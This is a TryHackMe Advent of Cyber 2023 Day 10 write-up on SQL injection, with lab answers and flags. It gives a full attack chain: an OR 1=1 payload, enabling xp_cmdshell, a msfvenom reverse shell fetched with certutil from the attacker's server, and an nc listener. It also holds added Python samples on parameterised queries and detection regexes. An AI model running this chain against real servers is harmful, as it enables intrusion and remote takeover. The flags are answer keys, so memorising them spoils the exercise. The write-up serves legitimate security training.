Advent of Cyber 2023 — Day 10 Writeup with Answers by Karthikeyan Nagaraj | TryHackMe
2023-12-11 12:00:23 Author: infosecwriteups.com Views: 30

TryHackMe — SQL Injection [ Inject the Halls with EXEC Queries ] — The team can no longer access the server hosting the website as the local credentials have been changed! Can you find a way in and restore the website?

Karthikeyan Nagaraj

InfoSec Write-ups

The Best Festival Company started receiving many reports that their company website, bestfestival.thm, is displaying some concerning information about the state of Christmas this year! After looking into the matter, Santa’s Security Operations Center (SSOC) confirmed that the company website has been hijacked and ultimately defaced, causing significant reputational damage. To make matters worse, the web development team has been locked out of the web server as the user credentials have been changed. With no other way to revert the changes, Elf Exploit McRed has been tasked with attempting to hack back into the server to regain access.

Structured query language (SQL) is essential for working with relational databases and building dynamic websites. Even if you’ve never explicitly used SQL before, chances are you frequently interact with databases. Whether you’re checking your bank account balance online, browsing through products on an e-commerce website, or posting a status on social media, you’re indirectly querying and altering databases. SQL is one of the most popular languages that make this all possible.

Relational databases are structured data collections organised into tables, each consisting of various rows and columns. Within these collections, tables are interconnected with predefined relationships, facilitating efficient data organisation and retrieval. For example, an e-commerce relational database might include tables for “customers”, “orders”, and “products”, with relationships defined to link customer information to their respective orders through the use of identifiers:

PHP is a popular general-purpose scripting language that plays a crucial role in web development. It enables developers to create dynamic and interactive websites by generating HTML content on the server and delivering it to the client’s web browser. PHP’s versatility and seamless integration with SQL databases make it a powerful tool for building feature-rich, dynamic web applications.

PHP is a server-side scripting language, meaning the code is executed on the web server before the final HTML is sent to the user’s browser. Unlike client-side technologies like HTML, CSS, and JavaScript, PHP allows developers to perform various server-side tasks, such as connecting to a wide range of databases (such as MySQL, PostgreSQL, and Microsoft SQL Server), executing SQL queries, processing form data, and dynamically generating web content.

Taking in user-supplied input gives us powerful ways to create dynamic content, but failing to secure this input correctly can expose a critical vulnerability known as SQL injection (SQLi). SQL injection is an attack technique that exploits how web applications handle user input, particularly in SQL queries. Instead of providing legitimate input (like the ornament colour in the example above), the attacker injects malicious SQL statements into a web application’s input fields or parameters. The application’s database server then executes this rogue SQL query.

SQL injection vulnerabilities pose a considerable risk to web applications as they can lead to unauthorised access, data theft, data manipulation, or even the complete compromise of a web application and its underlying database through remote code execution. If an attacker can control which queries the database executes, they can control the database functions performed and the data returned. As such, the impact can be catastrophic, ranging from exposing sensitive user information to causing significant data breaches.
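As an added example (not code from the writeup or from the lab), the gift search behind giftresults.php is rebuilt in Python against an in-memory SQLite table: the concatenated query lets the ' OR 1=1 -- payload rewrite the WHERE clause and return every row, while the parameterised version binds the same input as a literal age value and matches nothing. The table name, columns and rows are constructed assumptions, not the lab's real schema.

```python
import sqlite3

# Constructed sample data standing in for the gift table behind giftsearch.php;
# the table name, columns and rows are assumptions, not the lab's real schema.
SAMPLE_GIFTS = [
    ("Toy Train", 4),
    ("Chemistry Set", 8),
    ("Snow Globe", 12),
]


def make_db():
    """Create an in-memory database holding the constructed gift rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE gifts (name TEXT, age INTEGER)")
    conn.executemany("INSERT INTO gifts VALUES (?, ?)", SAMPLE_GIFTS)
    return conn


def search_vulnerable(conn, age):
    """String concatenation: the user's input becomes part of the SQL text,
    so ' OR 1=1 -- closes the quoted value, adds an always-true condition
    and comments out the trailing quote."""
    query = "SELECT name FROM gifts WHERE age = '" + age + "'"
    return [row[0] for row in conn.execute(query)]


def search_safe(conn, age):
    """Parameterised query: the driver binds the value separately from the
    SQL text, so the same payload is compared literally against the age
    column and matches no row."""
    query = "SELECT name FROM gifts WHERE age = ?"
    return [row[0] for row in conn.execute(query, (age,))]


if __name__ == "__main__":
    db = make_db()
    payload = "' OR 1=1 --"
    print(search_vulnerable(db, "8"))      # ['Chemistry Set']
    print(search_vulnerable(db, payload))  # every row in the table
    print(search_safe(db, payload))        # []
```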

SQL injection vulnerabilities continue to be highly pervasive despite numerous advancements to mitigate them. This type of vulnerability is featured prominently in the OWASP Top 10 list of critical web application security risks (A03:2021-Injection).

  1. Start the TryHackMe VPN or the AttackBox
  2. Start the machine and paste its IP address into your browser

1. Manually navigate the defaced website to find the vulnerable search form. What is the first webpage you come across that contains the gift-finding feature?

Ans: /giftsearch.php

2. Analyze the SQL error message that is returned. What ODBC Driver is being used in the back end of the website?

Inject a single quote (') into a parameter to trigger the error message

Ans: ODBC Driver 17 for SQL Server

3. Inject the 1=1 condition into the Gift Search form. What is the last result returned in the database?

Append ' OR 1=1 -- to the value of the parameter

Ans: THM{a4ffc901c27fb89efe3c31642ece4447}

4. What flag is in the note file Gr33dstr left behind on the system?

  1. Inject the below code first
    http://THM-MACHINE-IP/giftresults.php?age='; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; --
  2. Create a payload using the below command
    msfvenom -p windows/x64/shell_reverse_tcp LHOST=YOUR.IP.ADDRESS.HERE LPORT=4444 -f exe -o reverse.exe
  3. Start an HTTP server to host the payload with the below command
    python3 -m http.server 8000
  4. Download the payload onto the victim site using the below command
    http://THM-MACHINE-IP/giftresults.php?age='; EXEC xp_cmdshell 'certutil -urlcache -f http://YOUR.LISTENING.IP.ADDRESS.HERE:8000/reverse.exe C:\Windows\Temp\reverse.exe';--
  5. Set up a listener using the below command
    nc -lnvp 4444
  6. Execute the payload using the below command
    http://THM-MACHINE-IP/giftresults.php?age='; EXEC xp_cmdshell 'C:\Windows\Temp\reverse.exe'; --
  7. Change the directory to Administrator using the below command
    cd C:\Users\Administrator
  8. View the content of Note.txt using the below command
    type Note.txt

Ans: THM{b06674fedd8dfc28ca75176d3d51409e}
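An added example, not part of the writeup: a small Python detector that URL-decodes web request log lines and flags the indicators of the chain above (a stacked query opened with a quote and semicolon, sp_configure, xp_cmdshell, and a certutil download). The log lines and their field layout are constructed assumptions, not the lab's real logs.

```python
import re
from urllib.parse import unquote_plus

# Constructed request log lines (not taken from the lab); the layout
# "date time method path query status" is an assumption for this example.
SAMPLE_LOG = """\
2023-12-10 10:01:02 GET /giftsearch.php - 200
2023-12-10 10:01:09 GET /giftresults.php age=8 200
2023-12-10 10:02:15 GET /giftresults.php age=%27%3B+EXEC+sp_configure+%27xp_cmdshell%27%2C+1%3B+RECONFIGURE%3B+-- 500
2023-12-10 10:03:40 GET /giftresults.php age=%27%3B+EXEC+xp_cmdshell+%27certutil+-urlcache+-f+http%3A%2F%2F198.51.100.7%3A8000%2Fr.exe%27%3B-- 200
"""

# Indicators of the chain in the writeup: a stacked query opened by a quote
# and semicolon, the configuration change, the shell procedure itself, and
# the certutil download used to stage a binary on the host.
INDICATORS = [
    ("stacked_exec", re.compile(r"'\s*;\s*exec\b", re.I)),
    ("sp_configure", re.compile(r"\bsp_configure\b", re.I)),
    ("xp_cmdshell", re.compile(r"\bxp_cmdshell\b", re.I)),
    ("certutil_download", re.compile(r"\bcertutil\b[^;]*-urlcache", re.I)),
]


def decode_query(raw):
    """Decode %XX escapes and '+' so the patterns see what SQL Server would."""
    return unquote_plus(raw)


def suspicious_requests(log_text):
    """Return one record per log line that matches at least one indicator."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 6:
            continue
        timestamp = fields[0] + " " + fields[1]
        path, query, status = fields[3], fields[4], fields[5]
        decoded = decode_query(query)
        matched = [name for name, pat in INDICATORS if pat.search(decoded)]
        if matched:
            hits.append({"time": timestamp, "path": path, "status": status,
                         "query": decoded, "indicators": matched})
    return hits


if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit["time"], hit["path"], hit["status"], hit["indicators"])
```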

5. What is the flag you receive on the homepage after restoring the website?

Use your skills to find the answer to this question

If you are unable to find it, use the video below to find the answer


Source: https://infosecwriteups.com/advent-of-cyber-2023-day-10-writeup-with-answers-by-karthikeyan-nagaraj-tryhackme-978ebba480cc?source=rss----7b722bfd1b8d---4